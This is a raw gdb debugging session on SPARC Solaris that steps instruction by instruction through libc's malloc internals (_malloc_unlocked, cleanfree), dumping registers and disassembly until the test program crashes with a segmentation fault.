cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1de0 <_malloc_unlocked+28>: bleu 0xff2c1e00 <_malloc_unlocked+60>
0xff2c1de4 <_malloc_unlocked+32>: add %o1, %o7, %i2
0xff2c1de8 <_malloc_unlocked+36>: call 0xff33d068 <_PROCEDURE_LINKAGE_TABLE_+96>
0xff2c1dec <_malloc_unlocked+40>: nop
0xff2c1df0 <_malloc_unlocked+44>: mov 0xc, %o1 ! 0xc
0xff2c1df4 <_malloc_unlocked+48>: st %o1, [ %o0 ]
0xff2c1df8 <_malloc_unlocked+52>: ret
0xff2c1dfc <_malloc_unlocked+56>: restore %g0, 0, %o0
0xff2c1e00 <_malloc_unlocked+60>: ld [ %i2 + 0x4a4 ], %o1
0xff2c1e04 <_malloc_unlocked+64>: andcc %i0, 7, %o0
(gdb) si
0xff2c1de4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e00 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c1e00 <_malloc_unlocked+60>: ld [ %i2 + 0x4a4 ], %o1
0xff2c1e04 <_malloc_unlocked+64>: andcc %i0, 7, %o0
0xff2c1e08 <_malloc_unlocked+68>: mov %i0, %i3
0xff2c1e0c <_malloc_unlocked+72>: ld [ %i2 + 0x49c ], %o3
0xff2c1e10 <_malloc_unlocked+76>: neg %o0
0xff2c1e14 <_malloc_unlocked+80>: ld [ %o1 ], %o2
0xff2c1e18 <_malloc_unlocked+84>: add %o0, 8, %o0
0xff2c1e1c <_malloc_unlocked+88>: ld [ %o3 ], %o4
0xff2c1e20 <_malloc_unlocked+92>: be 0xff2c1e2c <_malloc_unlocked+104>
0xff2c1e24 <_malloc_unlocked+96>: cmp %o2, 0
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0xffffdfe7 -8217
o1 0x7a23c 500284
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0xff2c1dcc -13886004
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x7a27c 500348
i2 0xff33c008 -13385720
i3 0xff33c008 -13385720
i4 0x21eec 138988
i5 0xff2c1da0 -13886048
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe100000 -32505856 icc:---C, pil:0, s:0, ps:0, et:0, cwp:0
wim 0x0 0
tbr 0x0 0
pc 0xff2c1e00 4281081344
npc 0xff2c1e04 -13885948
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1e00 <_malloc_unlocked+60>: ld [ %i2 + 0x4a4 ], %o1
0xff2c1e04 <_malloc_unlocked+64>: andcc %i0, 7, %o0
0xff2c1e08 <_malloc_unlocked+68>: mov %i0, %i3
0xff2c1e0c <_malloc_unlocked+72>: ld [ %i2 + 0x49c ], %o3
0xff2c1e10 <_malloc_unlocked+76>: neg %o0
0xff2c1e14 <_malloc_unlocked+80>: ld [ %o1 ], %o2
0xff2c1e18 <_malloc_unlocked+84>: add %o0, 8, %o0
0xff2c1e1c <_malloc_unlocked+88>: ld [ %o3 ], %o4
0xff2c1e20 <_malloc_unlocked+92>: be 0xff2c1e2c <_malloc_unlocked+104>
0xff2c1e24 <_malloc_unlocked+96>: cmp %o2, 0
(gdb) si
0xff2c1e04 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e08 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x4 4
o1 0xff34284c -13359028
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0xff2c1dcc -13886004
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x7a27c 500348
i2 0xff33c008 -13385720
i3 0xff33c008 -13385720
i4 0x21eec 138988
i5 0xff2c1da0 -13886048
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe000004 -33554428 icc:----, pil:0, s:0, ps:0, et:0, cwp:4
wim 0x0 0
tbr 0x0 0
pc 0xff2c1e08 4281081352
npc 0xff2c1e0c -13885940
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1e08 <_malloc_unlocked+68>: mov %i0, %i3
0xff2c1e0c <_malloc_unlocked+72>: ld [ %i2 + 0x49c ], %o3
0xff2c1e10 <_malloc_unlocked+76>: neg %o0
0xff2c1e14 <_malloc_unlocked+80>: ld [ %o1 ], %o2
0xff2c1e18 <_malloc_unlocked+84>: add %o0, 8, %o0
0xff2c1e1c <_malloc_unlocked+88>: ld [ %o3 ], %o4
0xff2c1e20 <_malloc_unlocked+92>: be 0xff2c1e2c <_malloc_unlocked+104>
0xff2c1e24 <_malloc_unlocked+96>: cmp %o2, 0
0xff2c1e28 <_malloc_unlocked+100>: add %i0, %o0, %i3
0xff2c1e2c <_malloc_unlocked+104>: be 0xff2c1eb4 <_malloc_unlocked+240>
(gdb) si
0xff2c1e0c in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e10 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e14 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e18 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e1c in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e20 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e24 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e28 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e2c in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e30 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1eb4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1eb8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c2d28 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d2c in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d30 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d34 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d38 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d3c in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d40 in cleanfree () from /usr/lib/libc.so.1
(gdb) x/10i 0xff2c1e28
0xff2c1e28 <_malloc_unlocked+100>: add %i0, %o0, %i3
0xff2c1e2c <_malloc_unlocked+104>: be 0xff2c1eb4 <_malloc_unlocked+240>
0xff2c1e30 <_malloc_unlocked+108>: clr %i5
0xff2c1e34 <_malloc_unlocked+112>: ld [ %o2 + -8 ], %o0
0xff2c1e38 <_malloc_unlocked+116>: and %o0, -4, %o5
0xff2c1e3c <_malloc_unlocked+120>: cmp %o5, %i3
0xff2c1e40 <_malloc_unlocked+124>: bne 0xff2c1e68 <_malloc_unlocked+164>
0xff2c1e44 <_malloc_unlocked+128>: add %o4, 0x1f, %o0
0xff2c1e48 <_malloc_unlocked+132>: clr [ %o1 ]
0xff2c1e4c <_malloc_unlocked+136>: and %o0, 0x1f, %o0
(gdb) x/10i 0xff2c1eb4
0xff2c1eb4 <_malloc_unlocked+240>: call 0xff2c2d28 <cleanfree>
0xff2c1eb8 <_malloc_unlocked+244>: clr %o0
0xff2c1ebc <_malloc_unlocked+248>: cmp %i3, 0x28
0xff2c1ec0 <_malloc_unlocked+252>: bcc 0xff2c1ed0 <_malloc_unlocked+268>
0xff2c1ec4 <_malloc_unlocked+256>: clr %i4
0xff2c1ec8 <_malloc_unlocked+260>: call 0xff2c1cdc <_smalloc>
0xff2c1ecc <_malloc_unlocked+264>: restore %g0, %i3, %o0
0xff2c1ed0 <_malloc_unlocked+268>: ld [ %i2 + 0x4b0 ], %o0
0xff2c1ed4 <_malloc_unlocked+272>: ld [ %o0 ], %i1
0xff2c1ed8 <_malloc_unlocked+276>: clr %o0
(gdb) si
0xff2c2d44 in cleanfree () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c2d44 <cleanfree+28>: ld [ %i1 + 0x4a0 ], %i2
0xff2c2d48 <cleanfree+32>: ld [ %o0 ], %o0
0xff2c2d4c <cleanfree+36>: add %i2, 0x80, %i3
0xff2c2d50 <cleanfree+40>: sll %o0, 2, %o0
0xff2c2d54 <cleanfree+44>: add %o0, %i2, %i4
0xff2c2d58 <cleanfree+48>: cmp %i4, %i2
0xff2c2d5c <cleanfree+52>: be,a 0xff2c2d64 <cleanfree+60>
0xff2c2d60 <cleanfree+56>: mov %i3, %i4
0xff2c2d64 <cleanfree+60>: sub %i4, 4, %i4
0xff2c2d68 <cleanfree+64>: ld [ %i4 ], %o0
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0xff3427c8 -13359160
o1 0x792dc 496348
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeede0 4290702816
o7 0xff2c2d2c -13882068
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x0 0
i1 0xff33c008 -13385720
i2 0x0 0
i3 0xff3427c8 -13359160
i4 0x0 0
i5 0x0 0
fp 0xffbeee40 4290702912
i7 0xff2c1eb4 -13885772
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe400002 -29360126 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:2
wim 0x0 0
tbr 0x0 0
pc 0xff2c2d44 4281085252
npc 0xff2c2d48 -13882040
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c2d44 <cleanfree+28>: ld [ %i1 + 0x4a0 ], %i2
0xff2c2d48 <cleanfree+32>: ld [ %o0 ], %o0
0xff2c2d4c <cleanfree+36>: add %i2, 0x80, %i3
0xff2c2d50 <cleanfree+40>: sll %o0, 2, %o0
0xff2c2d54 <cleanfree+44>: add %o0, %i2, %i4
0xff2c2d58 <cleanfree+48>: cmp %i4, %i2
0xff2c2d5c <cleanfree+52>: be,a 0xff2c2d64 <cleanfree+60>
0xff2c2d60 <cleanfree+56>: mov %i3, %i4
0xff2c2d64 <cleanfree+60>: sub %i4, 4, %i4
0xff2c2d68 <cleanfree+64>: ld [ %i4 ], %o0
(gdb) si
0xff2c2d48 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d4c in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d50 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d54 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d58 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d5c in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d60 in cleanfree () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x0 0
o1 0x792dc 496348
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeede0 4290702816
o7 0xff2c2d2c -13882068
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x0 0
i1 0xff33c008 -13385720
i2 0xff3427cc -13359156
i3 0xff34284c -13359028
i4 0xff3427cc -13359156
i5 0x0 0
fp 0xffbeee40 4290702912
i7 0xff2c1eb4 -13885772
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe400002 -29360126 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:2
wim 0x0 0
tbr 0x0 0
pc 0xff2c2d60 4281085280
npc 0xff2c2d64 -13882012
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c2d60 <cleanfree+56>: mov %i3, %i4
0xff2c2d64 <cleanfree+60>: sub %i4, 4, %i4
0xff2c2d68 <cleanfree+64>: ld [ %i4 ], %o0
0xff2c2d6c <cleanfree+68>: cmp %o0, 0
0xff2c2d70 <cleanfree+72>: be 0xff2c2d94 <cleanfree+108>
0xff2c2d74 <cleanfree+76>: cmp %o0, %i5
0xff2c2d78 <cleanfree+80>: be,a 0xff2c2d58 <cleanfree+48>
0xff2c2d7c <cleanfree+84>: clr [ %i4 ]
0xff2c2d80 <cleanfree+88>: call 0xff2c240c <realfree>
0xff2c2d84 <cleanfree+92>: nop
(gdb) si
0xff2c2d64 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d68 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d6c in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d70 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d74 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d94 in cleanfree () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c2d94 <cleanfree+108>: ld [ %i1 + 0x49c ], %o0
0xff2c2d98 <cleanfree+112>: clr [ %o0 ]
0xff2c2d9c <cleanfree+116>: ld [ %i1 + 0x4a4 ], %o0
0xff2c2da0 <cleanfree+120>: clr [ %o0 ]
0xff2c2da4 <cleanfree+124>: ret
0xff2c2da8 <cleanfree+128>: restore
0xff2c2dac <memalign>: save %sp, -96, %sp
0xff2c2db0 <memalign+4>: call 0xff2c2db8 <memalign+12>
0xff2c2db4 <memalign+8>: sethi %hi(0x79000), %o1
0xff2c2db8 <memalign+12>: sethi %hi(0x80000000), %o0
(gdb) i
"info" must be followed by the name of an info command.
List of info subcommands:
info address -- Describe where symbol SYM is stored
info all-registers -- List of all registers and their contents
info args -- Argument variables of current stack frame
info breakpoints -- Status of user-settable breakpoints
info catch -- Exceptions that can be caught in the current stack frame
info common -- Print out the values contained in a Fortran COMMON block
info copying -- Conditions for redistributing copies of GDB
info dcache -- Print information on the dcache performance
info display -- Expressions to display when program stops
info extensions -- All filename extensions associated with a source language
info files -- Names of targets and files being debugged
info float -- Print the status of the floating point unit
info frame -- All about selected stack frame
info functions -- All function names
info handle -- What debugger does when program gets various signals
info line -- Core addresses of the code for a source line
info locals -- Local variables of current stack frame
info macro -- Show the definition of MACRO
info mem -- Memory region attributes
info proc -- Show /proc process information about any running process
info program -- Execution status of the program
info registers -- List of integer registers and their contents
info remote-process -- Query the remote system for process info
info scope -- List the variables local to a scope
info set -- Show all GDB settings
info sharedlibrary -- Status of loaded shared object libraries
info signals -- What debugger does when program gets various signals
info source -- Information about the current source file
info sources -- Source files in the program
info stack -- Backtrace of the stack
info symbol -- Describe what symbol is at location ADDR
---Type <return> to continue, or q <return> to quit---qi
Quit
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x0 0
o1 0x792dc 496348
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeede0 4290702816
o7 0xff2c2d2c -13882068
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x0 0
i1 0xff33c008 -13385720
i2 0xff3427cc -13359156
i3 0xff34284c -13359028
i4 0xff342848 -13359032
i5 0x0 0
fp 0xffbeee40 4290702912
i7 0xff2c1eb4 -13885772
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe400000 -29360128 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:0
wim 0x0 0
tbr 0x0 0
pc 0xff2c2d94 4281085332
npc 0xff2c2d98 -13881960
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c2d94 <cleanfree+108>: ld [ %i1 + 0x49c ], %o0
0xff2c2d98 <cleanfree+112>: clr [ %o0 ]
0xff2c2d9c <cleanfree+116>: ld [ %i1 + 0x4a4 ], %o0
0xff2c2da0 <cleanfree+120>: clr [ %o0 ]
0xff2c2da4 <cleanfree+124>: ret
0xff2c2da8 <cleanfree+128>: restore
0xff2c2dac <memalign>: save %sp, -96, %sp
0xff2c2db0 <memalign+4>: call 0xff2c2db8 <memalign+12>
0xff2c2db4 <memalign+8>: sethi %hi(0x79000), %o1
0xff2c2db8 <memalign+12>: sethi %hi(0x80000000), %o0
(gdb) si
0xff2c2d98 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d9c in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2da0 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2da4 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2da8 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c1ebc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c1ebc <_malloc_unlocked+248>: cmp %i3, 0x28
0xff2c1ec0 <_malloc_unlocked+252>: bcc 0xff2c1ed0 <_malloc_unlocked+268>
0xff2c1ec4 <_malloc_unlocked+256>: clr %i4
0xff2c1ec8 <_malloc_unlocked+260>: call 0xff2c1cdc <_smalloc>
0xff2c1ecc <_malloc_unlocked+264>: restore %g0, %i3, %o0
0xff2c1ed0 <_malloc_unlocked+268>: ld [ %i2 + 0x4b0 ], %o0
0xff2c1ed4 <_malloc_unlocked+272>: ld [ %o0 ], %i1
0xff2c1ed8 <_malloc_unlocked+276>: clr %o0
0xff2c1edc <_malloc_unlocked+280>: cmp %i1, 0
0xff2c1ee0 <_malloc_unlocked+284>: be 0xff2c1f80 <_malloc_unlocked+444>
(gdb) si
0xff2c1ec0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ec4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ed0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ed4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0xff342858 -13359016
o1 0xff33c008 -13385720
o2 0xff3427cc -13359156
o3 0xff34284c -13359028
o4 0xff342848 -13359032
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0xff2c1eb4 -13885772
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x7a27c 500348
i2 0xff33c008 -13385720
i3 0x130 304
i4 0x0 0
i5 0x0 0
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe000004 -33554428 icc:----, pil:0, s:0, ps:0, et:0, cwp:4
wim 0x0 0
tbr 0x0 0
pc 0xff2c1ed4 4281081556
npc 0xff2c1ed8 -13885736
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1ed4 <_malloc_unlocked+272>: ld [ %o0 ], %i1
0xff2c1ed8 <_malloc_unlocked+276>: clr %o0
0xff2c1edc <_malloc_unlocked+280>: cmp %i1, 0
0xff2c1ee0 <_malloc_unlocked+284>: be 0xff2c1f80 <_malloc_unlocked+444>
0xff2c1ee4 <_malloc_unlocked+288>: cmp %i4, 0
0xff2c1ee8 <_malloc_unlocked+292>: ld [ %i1 ], %o1
0xff2c1eec <_malloc_unlocked+296>: cmp %o1, %i3
0xff2c1ef0 <_malloc_unlocked+300>: bcs 0xff2c1f2c <_malloc_unlocked+360>
0xff2c1ef4 <_malloc_unlocked+304>: cmp %o0, 0
0xff2c1ef8 <_malloc_unlocked+308>: be 0xff2c1f08 <_malloc_unlocked+324>
(gdb) si
0xff2c1ed8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1edc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ee0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ee4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1f80 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c1f80 <_malloc_unlocked+444>: bne 0xff2c1fd8 <_malloc_unlocked+532>
0xff2c1f84 <_malloc_unlocked+448>: ld [ %i2 + 0x4ac ], %o0
0xff2c1f88 <_malloc_unlocked+452>: ld [ %o0 ], %o1
0xff2c1f8c <_malloc_unlocked+456>: cmp %o1, 0
0xff2c1f90 <_malloc_unlocked+460>: be 0xff2c1fbc <_malloc_unlocked+504>
0xff2c1f94 <_malloc_unlocked+464>: nop
0xff2c1f98 <_malloc_unlocked+468>: ld [ %o1 ], %o0
0xff2c1f9c <_malloc_unlocked+472>: mov %o1, %i4
0xff2c1fa0 <_malloc_unlocked+476>: cmp %i3, %o0
0xff2c1fa4 <_malloc_unlocked+480>: bgu 0xff2c1fbc <_malloc_unlocked+504>
(gdb) si
0xff2c1f84 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1f88 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1f8c in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1f90 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1f94 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1f98 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1f9c in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fa0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fa4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c1fa4 <_malloc_unlocked+480>: bgu 0xff2c1fbc <_malloc_unlocked+504>
0xff2c1fa8 <_malloc_unlocked+484>: nop
0xff2c1fac <_malloc_unlocked+488>: and %o0, -4, %o0
0xff2c1fb0 <_malloc_unlocked+492>: st %o0, [ %o1 ]
0xff2c1fb4 <_malloc_unlocked+496>: b 0xff2c1fdc <_malloc_unlocked+536>
0xff2c1fb8 <_malloc_unlocked+500>: ld [ %i4 ], %o0
0xff2c1fbc <_malloc_unlocked+504>: call 0xff2c2670 <_morecore>
0xff2c1fc0 <_malloc_unlocked+508>: mov %i3, %o0
0xff2c1fc4 <_malloc_unlocked+512>: orcc %g0, %o0, %i4
0xff2c1fc8 <_malloc_unlocked+516>: bne,a 0xff2c1fdc <_malloc_unlocked+536>
(gdb) si
0xff2c1fa8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fac in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fb0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fb4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fb8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fdc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fe0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Program received signal SIGSEGV, Segmentation fault.
0xff2c1fe0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x41022a28 1090660904
o1 0x20d60 134496
o2 0xff3427cc -13359156
o3 0xff34284c -13359028
o4 0xff342848 -13359032
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0xff2c1eb4 -13885772
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x0 0
i2 0xff33c008 -13385720
i3 0x130 304
i4 0x20d60 134496
i5 0x0 0
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/10i 0xff2c1fdc
0xff2c1fdc <_malloc_unlocked+536>: add %i4, %o0, %o0
0xff2c1fe0 <_malloc_unlocked+540>: ld [ %o0 + 8 ], %o1
0xff2c1fe4 <_malloc_unlocked+544>: and %o1, -3, %o1
0xff2c1fe8 <_malloc_unlocked+548>: st %o1, [ %o0 + 8 ]
0xff2c1fec <_malloc_unlocked+552>: ld [ %i4 ], %o2
0xff2c1ff0 <_malloc_unlocked+556>: sub %o2, %i3, %o0
0xff2c1ff4 <_malloc_unlocked+560>: cmp %o0, 0x30
0xff2c1ff8 <_malloc_unlocked+564>: bcs 0xff2c2024 <_malloc_unlocked+608>
0xff2c1ffc <_malloc_unlocked+568>: sub %o0, 8, %o1
0xff2c2000 <_malloc_unlocked+572>: st %i3, [ %i4 ]
(gdb) b *0xff2c1fdc
Breakpoint 5 at 0xff2c1fdc
(gdb) r 801
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out 801
Breakpoint 3, 0xff2c1d8c in malloc () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Breakpoint 5, 0xff2c1fdc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x1ff0 8176
o1 0xff33c008 -13385720
o2 0x0 0
o3 0x0 0
o4 0x20a38 133688
o5 0x2000 8192
sp 0xffbeeeb8 4290703032
o7 0xff2c1fbc -13885508
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x320 800
i1 0x0 0
i2 0xff33c008 -13385720
i3 0x320 800
i4 0x20a38 133688
i5 0x0 0
fp 0xffbeef18 4290703128
i7 0xff2c1da8 -13886040
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe000006 -33554426 icc:----, pil:0, s:0, ps:0, et:0, cwp:6
wim 0x0 0
tbr 0x0 0
pc 0xff2c1fdc 4281081820
npc 0xff2c1fe0 -13885472
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) si
0xff2c1fe0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x22a28 141864
o1 0xff33c008 -13385720
o2 0x0 0
o3 0x0 0
o4 0x20a38 133688
o5 0x2000 8192
sp 0xffbeeeb8 4290703032
o7 0xff2c1fbc -13885508
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x320 800
i1 0x0 0
i2 0xff33c008 -13385720
i3 0x320 800
i4 0x20a38 133688
i5 0x0 0
fp 0xffbeef18 4290703128
i7 0xff2c1da8 -13886040
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe000006 -33554426 icc:----, pil:0, s:0, ps:0, et:0, cwp:6
wim 0x0 0
tbr 0x0 0
pc 0xff2c1fe0 4281081824
npc 0xff2c1fe4 -13885468
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/x 0x22a30
0x22a30: 0x00000001
(gdb) x/x 0x22a28
0x22a28: 0x00000000
(gdb) p/x p
No symbol "p" in current context.
(gdb) info proc map
process 26445 flags:
PR_STOPPED Process (LWP) is stopped
PR_ISTOP Stopped on an event of interest
PR_RLC Run-on-last-close is in effect
PR_FAULTED : Incurred a traced hardware fault FLTTRACE: Trace trap
Mapped address spaces:
Start Addr End Addr Size Offset Flags
0x10000 0x11fff 0x2000 0 ----r-x
0x20000 0x21fff 0x2000 0 ----rwx
0x22000 0x23fff 0x2000 0 --b-rwx
0xff280000 0xff32bfff 0xac000 0 ----r-x
0xff33c000 0xff343fff 0x8000 0xac000 ----rwx
